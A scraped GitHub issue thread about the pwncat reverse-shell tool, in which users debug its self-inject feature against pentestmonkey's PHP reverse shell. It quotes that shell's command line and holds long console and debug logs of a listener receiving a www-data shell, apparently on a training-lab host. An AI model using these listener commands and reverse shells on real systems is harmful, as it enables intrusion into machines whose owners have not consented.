Code Monkey home page Code Monkey logo

Comments (26)

cytopia avatar cytopia commented on July 28, 2024 1

Also not sure what exactly is going on. Will prepare something which is checking if data is to be received before probing.

from pwncat.

cytopia avatar cytopia commented on July 28, 2024 1

Found the issue: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php#L54

It is doing this upon connect:

<?php
$shell = 'uname -a; w; id; /bin/sh -i';

So it's sending output of the following commands upon connect (which pwncat does not expect):

  1. uname -a
  2. w
  3. id

I can now reproduce this and will try to find a generic solution to such kind of reverse shells

from pwncat.

cytopia avatar cytopia commented on July 28, 2024 1

@dalemazza that should now be fixed in the latest commit of branch release-0.1.0 (PR: #80) -

from pwncat.

cytopia avatar cytopia commented on July 28, 2024 1

Thanks for the update. Currently working on getting multiple different remote shells to work and also preparing regression tests for CI for that. I will ping you once I got it working for all edge cases.

from pwncat.

cytopia avatar cytopia commented on July 28, 2024 1

@dalemazza I made quite a lot of changes now. You can try and pull the latest commit from the release branch and see if that works out for you.

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024 1

It works! great work man. Such a great tool, the self inject bit is genius!

from pwncat.

cytopia avatar cytopia commented on July 28, 2024 1

Glad to hear. Let's leave this ticket open until the branch is merged.

from pwncat.

cytopia avatar cytopia commented on July 28, 2024 1

@dalemazza It's now release and available via pip

from pwncat.

cytopia avatar cytopia commented on July 28, 2024
kali@kali:/opt/pwncat$ pwncat -l 1234 --self-inject /bin/bash:10.9.33.138:1234
[PWNCAT CnC] Probing for: /bin/python
[PWNCAT CnC] Probing for: /bin/python2
[PWNCAT CnC] Probing for: /bin/python2.7
[PWNCAT CnC] Probing for: /bin/python3
[PWNCAT CnC] Probing for: /bin/python3.5
[PWNCAT CnC] Probing for: /bin/python3.6
[PWNCAT CnC] Probing for: /bin/python3.7
[PWNCAT CnC] Probing for: /bin/python3.8
[PWNCAT CnC] Probing for: /usr/bin/python
[PWNCAT CnC] Probing for: /usr/bin/python2
[PWNCAT CnC] Probing for: /usr/bin/python2.7
[PWNCAT CnC] Probing for: /usr/bin/python3
[PWNCAT CnC] Probing for: /usr/bin/python3.5
[PWNCAT CnC] Probing for: /usr/bin/python3.6
[PWNCAT CnC] Probing for: /usr/bin/python3.7
[PWNCAT CnC] Probing for: /usr/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/bin/python
[PWNCAT CnC] Probing for: /usr/local/bin/python2
[PWNCAT CnC] Probing for: /usr/local/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/bin/python3
[PWNCAT CnC] Probing for: /usr/local/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/python/bin/python
[PWNCAT CnC] Probing for: /usr/local/python/bin/python2
[PWNCAT CnC] Probing for: /usr/local/python/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python2
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python2
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python2
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python2
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python2
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python2
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.8
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python2
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python2.7
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.5
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.6
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.7
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.8
[PWNCAT CnC] Probing for: /opt/bin/python
[PWNCAT CnC] Probing for: /opt/bin/python2
[PWNCAT CnC] Probing for: /opt/bin/python2.7
[PWNCAT CnC] Probing for: /opt/bin/python3
[PWNCAT CnC] Probing for: /opt/bin/python3.5
[PWNCAT CnC] Probing for: /opt/bin/python3.6
[PWNCAT CnC] Probing for: /opt/bin/python3.7
[PWNCAT CnC] Probing for: /opt/bin/python3.8
[PWNCAT CnC] Probing for: /opt/python/bin/python
[PWNCAT CnC] Probing for: /opt/python/bin/python2
[PWNCAT CnC] Probing for: /opt/python/bin/python2.7
[PWNCAT CnC] Probing for: /opt/python/bin/python3
[PWNCAT CnC] Probing for: /opt/python/bin/python3.5
[PWNCAT CnC] Probing for: /opt/python/bin/python3.6
[PWNCAT CnC] Probing for: /opt/python/bin/python3.7
[PWNCAT CnC] Probing for: /opt/python/bin/python3.8
[PWNCAT CnC] Probing for: /opt/python2/bin/python
[PWNCAT CnC] Probing for: /opt/python2/bin/python2
[PWNCAT CnC] Probing for: /opt/python2/bin/python2.7
[PWNCAT CnC] Probing for: /opt/python2/bin/python3
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.5
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.6
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.7
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.8
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python2
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python2.7
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.5
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.6
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.7
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.8
[PWNCAT CnC] Probing for: /opt/python3/bin/python
[PWNCAT CnC] Probing for: /opt/python3/bin/python2
[PWNCAT CnC] Probing for: /opt/python3/bin/python2.7
[PWNCAT CnC] Probing for: /opt/python3/bin/python3
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.5
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.6
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.7
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.8
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python2
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python2.7
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.5
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.6
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.7
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.8
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python2
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python2.7
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.5
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.6
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.7
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.8
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python2
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python2.7
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.5
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.6
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.7
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.8
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python2
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python2.7
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.5
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.6
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.7
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.8
[PWNCAT CnC] No Python has been found. Aborting and handing over to current shell.

$ 
$ which python
/usr/bin/python

python is installed as i used it to upgrade the shell

from pwncat.

cytopia avatar cytopia commented on July 28, 2024
`kali@kali:~/thm$ pwncat -l 1234 --self-inject /bin/bash:10.9.33.138:1234 -vvvvv
2020-06-12 15:46:29,852 DEBUG [MainThread] 1447:create_socket(): Creating (family 10/IPv6, TCP) socket
2020-06-12 15:46:29,852 DEBUG [MainThread] 1467:create_socket(): Disabling IPv4 support on IPv6 socket
2020-06-12 15:46:29,852 DEBUG [MainThread] 1447:create_socket(): Creating (family 2/IPv4, TCP) socket
2020-06-12 15:46:29,852 DEBUG [MainThread] 1385:gethostbyname(): Resolving IPv6 name not required, using wildcard: ::
2020-06-12 15:46:29,852 DEBUG [MainThread] 1382:gethostbyname(): Resolving IPv4 name not required, using wildcard: 0.0.0.0
2020-06-12 15:46:29,852 DEBUG [MainThread] 1498:bind(): Binding (family 10/IPv6, TCP) socket to :::1234
2020-06-12 15:46:29,852 DEBUG [MainThread] 1498:bind(): Binding (family 2/IPv4, TCP) socket to 0.0.0.0:1234
2020-06-12 15:46:29,852 DEBUG [MainThread] 1526:listen(): Listening with backlog=0
2020-06-12 15:46:29,853 INFO [MainThread] 2151:run_server(): Listening on :::1234 (family 10/IPv6, TCP)
2020-06-12 15:46:29,853 DEBUG [MainThread] 1526:listen(): Listening with backlog=0
2020-06-12 15:46:29,853 INFO [MainThread] 2151:run_server(): Listening on 0.0.0.0:1234 (family 2/IPv4, TCP)
2020-06-12 15:46:29,853 DEBUG [MainThread] 1549:accept(): Waiting for TCP client
2020-06-12 15:46:44,417 INFO [MainThread] 1561:accept(): Client connected from 10.10.154.144:34498 (family 2/IPv4, TCP)
[PWNCAT CnC] Probing for: /bin/python
2020-06-12 15:46:44,419 DEBUG [MainThread] 1803:send(): Trying to send 49 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,419 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python && echo /bin/python || echo;\n'
2020-06-12 15:46:44,419 DEBUG [MainThread] 1826:send(): Sent 49 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,420 DEBUG [MainThread] 1938:receive(): Received 115 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,420 TRACE [MainThread] 1944:receive(): Received: 'Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux\n'
[PWNCAT CnC] Probing for: /bin/python2
2020-06-12 15:46:44,421 DEBUG [MainThread] 1803:send(): Trying to send 51 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,421 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python2 && echo /bin/python2 || echo;\n'
2020-06-12 15:46:44,421 DEBUG [MainThread] 1826:send(): Sent 51 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,444 DEBUG [MainThread] 1938:receive(): Received 240 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,444 TRACE [MainThread] 1944:receive(): Received: " 15:46:44 up 27 min,  0 users,  load average: 0.00, 0.00, 0.07\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n/bin/sh: 0: can't access tty; job control turned off\n$ "
[PWNCAT CnC] Probing for: /bin/python2.7
2020-06-12 15:46:44,445 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,445 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python2.7 && echo /bin/python2.7 || echo;\n'
2020-06-12 15:46:44,445 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,472 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,472 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /bin/python3
2020-06-12 15:46:44,473 DEBUG [MainThread] 1803:send(): Trying to send 51 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,473 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3 && echo /bin/python3 || echo;\n'
2020-06-12 15:46:44,473 DEBUG [MainThread] 1826:send(): Sent 51 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,516 DEBUG [MainThread] 1938:receive(): Received 6 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,516 TRACE [MainThread] 1944:receive(): Received: '\n$ \n$ '
[PWNCAT CnC] Probing for: /bin/python3.5
2020-06-12 15:46:44,517 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,517 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.5 && echo /bin/python3.5 || echo;\n'
2020-06-12 15:46:44,517 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,554 DEBUG [MainThread] 1938:receive(): Received 1 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,554 TRACE [MainThread] 1944:receive(): Received: '\n'
[PWNCAT CnC] Probing for: /bin/python3.6
2020-06-12 15:46:44,554 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,554 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.6 && echo /bin/python3.6 || echo;\n'
2020-06-12 15:46:44,555 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,581 DEBUG [MainThread] 1938:receive(): Received 2 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,581 TRACE [MainThread] 1944:receive(): Received: '$ '
[PWNCAT CnC] Probing for: /bin/python3.7
2020-06-12 15:46:44,581 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,581 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.7 && echo /bin/python3.7 || echo;\n'
2020-06-12 15:46:44,581 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,614 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,614 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /bin/python3.8
2020-06-12 15:46:44,614 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,615 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.8 && echo /bin/python3.8 || echo;\n'
2020-06-12 15:46:44,615 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,642 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,642 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python
2020-06-12 15:46:44,642 DEBUG [MainThread] 1803:send(): Trying to send 57 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,642 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python && echo /usr/bin/python || echo;\n'
2020-06-12 15:46:44,642 DEBUG [MainThread] 1826:send(): Sent 57 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,669 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,669 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python2
2020-06-12 15:46:44,669 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,669 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python2 && echo /usr/bin/python2 || echo;\n'
2020-06-12 15:46:44,669 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,706 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,706 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python2.7
2020-06-12 15:46:44,706 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,706 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python2.7 && echo /usr/bin/python2.7 || echo;\n'
2020-06-12 15:46:44,706 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,735 DEBUG [MainThread] 1938:receive(): Received 18 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,735 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3
2020-06-12 15:46:44,735 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,735 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo;\n'
2020-06-12 15:46:44,735 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,788 DEBUG [MainThread] 1938:receive(): Received 19 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,788 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python2\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.5
2020-06-12 15:46:44,788 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,788 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.5 && echo /usr/bin/python3.5 || echo;\n'
2020-06-12 15:46:44,788 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,840 DEBUG [MainThread] 1938:receive(): Received 21 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,840 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python2.7\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.6
2020-06-12 15:46:44,840 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,840 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.6 && echo /usr/bin/python3.6 || echo;\n'
2020-06-12 15:46:44,840 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,872 DEBUG [MainThread] 1938:receive(): Received 19 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,872 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python3\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.7
2020-06-12 15:46:44,872 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,872 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.7 && echo /usr/bin/python3.7 || echo;\n'
2020-06-12 15:46:44,872 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,903 DEBUG [MainThread] 1938:receive(): Received 21 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,903 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python3.5\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.8
2020-06-12 15:46:44,903 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,903 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.8 && echo /usr/bin/python3.8 || echo;\n'
2020-06-12 15:46:44,903 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:44,930 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:44,930 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python
2020-06-12 15:46:44,930 DEBUG [MainThread] 1803:send(): Trying to send 69 bytes to 10.10.154.144:34498
2020-06-12 15:46:44,930 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python && echo /usr/local/bin/python || echo;\n'
2020-06-12 15:46:44,931 DEBUG [MainThread] 1826:send(): Sent 69 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,018 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,018 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python2
2020-06-12 15:46:45,018 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,018 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python2 && echo /usr/local/bin/python2 || echo;\n'
2020-06-12 15:46:45,018 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,047 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,047 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python2.7
2020-06-12 15:46:45,047 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,047 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python2.7 && echo /usr/local/bin/python2.7 || echo;\n'
2020-06-12 15:46:45,047 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,083 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,083 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3
2020-06-12 15:46:45,083 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,083 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3 && echo /usr/local/bin/python3 || echo;\n'
2020-06-12 15:46:45,083 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,109 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,109 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.5
2020-06-12 15:46:45,109 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,109 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.5 && echo /usr/local/bin/python3.5 || echo;\n'
2020-06-12 15:46:45,109 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,138 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,138 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.6
2020-06-12 15:46:45,138 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,138 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.6 && echo /usr/local/bin/python3.6 || echo;\n'
2020-06-12 15:46:45,138 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,166 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,166 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.7
2020-06-12 15:46:45,166 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,166 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.7 && echo /usr/local/bin/python3.7 || echo;\n'
2020-06-12 15:46:45,166 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,193 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,193 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.8
2020-06-12 15:46:45,194 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,194 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.8 && echo /usr/local/bin/python3.8 || echo;\n'
2020-06-12 15:46:45,194 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,220 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,220 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python
2020-06-12 15:46:45,221 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,221 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python && echo /usr/local/python/bin/python || echo;\n'
2020-06-12 15:46:45,221 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,275 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,275 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python2
